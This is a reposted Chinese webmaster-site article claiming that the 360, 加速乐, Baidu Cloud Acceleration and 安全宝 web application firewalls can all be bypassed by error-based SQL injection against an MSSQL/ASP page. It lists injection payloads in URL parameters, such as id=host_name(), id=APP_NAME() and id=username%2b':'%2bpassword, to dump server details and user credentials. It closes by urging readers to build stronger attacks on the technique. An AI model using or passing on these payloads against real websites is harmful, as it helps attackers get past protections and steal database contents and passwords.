百度云加速/加速乐/安全宝/360等所有waf产品某些_工具资源_青云站长教程网
欢迎来到站长教程网!
  • 秒到短信接口 免费试用
  • 微信支付宝接口 秒结算
  • 中文网站排名|申请加入
  • 搜索引擎全站查询
  • 查询移动网站权重数据
  • 海外主机 台湾公司直销
  • 工具资源

    当前位置:主页 > 网站运营 > 工具资源 >

    百度云加速/加速乐/安全宝/360等所有waf产品某些

    时间:2019-08-12|栏目:工具资源|点击:
  • 测试了下市面上 360/加速乐/百度云加速/安全宝

     

    这四个waf产品 在某种条件下均可以绕过 顺利注射出数据库信息。

     

    首先我自己搭建了环境 mssql+asp 

     

    构造了一个 数字型的报错注入点。

     

     :81/asp/num.asp?id=host_name()

    百度云加速/加速乐/安全宝/360等所有waf产品某些

    :81/asp/num.asp?id=user

    百度云加速/加速乐/安全宝/360等所有waf产品某些

    :81/asp/num.asp?id=APP_NAME()

    百度云加速/加速乐/安全宝/360等所有waf产品某些

    等等 可以根据内置变量爆出很多想要的信息。

     

    另外 如果能猜到字段名还可以这样。

    百度云加速/加速乐/安全宝/360等所有waf产品某些

    爆出了用户名与密码。

     

    在测试 做了 360网站卫士/加速乐/百度云加速/安全宝 保护的网站之后

     

    对这种情况的注射都 束手无策,全部都放行。

     

     

    这里仅用一例 说明

     

    下面是加速乐保护的

     

    ?id=username%2b':'%2bpassword

     

    百度云加速/加速乐/安全宝/360等所有waf产品某些

    顺利放行。

     

    以上所有测试url 这些waf产品均没有拦截

     

    广大基友可以根据我抛出的砖发扬一下,弄出更厉害的东西出来

    上一篇:帝友P2P借贷系统搜索型SQL注入 - 网站安全 - 自学

    栏    目:工具资源

    下一篇:淘宝联盟推出新规则 新手门槛明显提升_建站经验教程

    本文标题:百度云加速/加速乐/安全宝/360等所有waf产品某些

    本文地址:http://www.jh-floor.com/wangzhanyunying/gongjuziyuan/19921.html

    广告投放 | 联系我们 | 版权申明

    重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

    如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

    联系QQ:888888 | 邮箱:888888#qq.com(#换成@)

    Copyright © 2002-2017 青云站长教程网 版权所有 琼ICP备xxxxxxxx号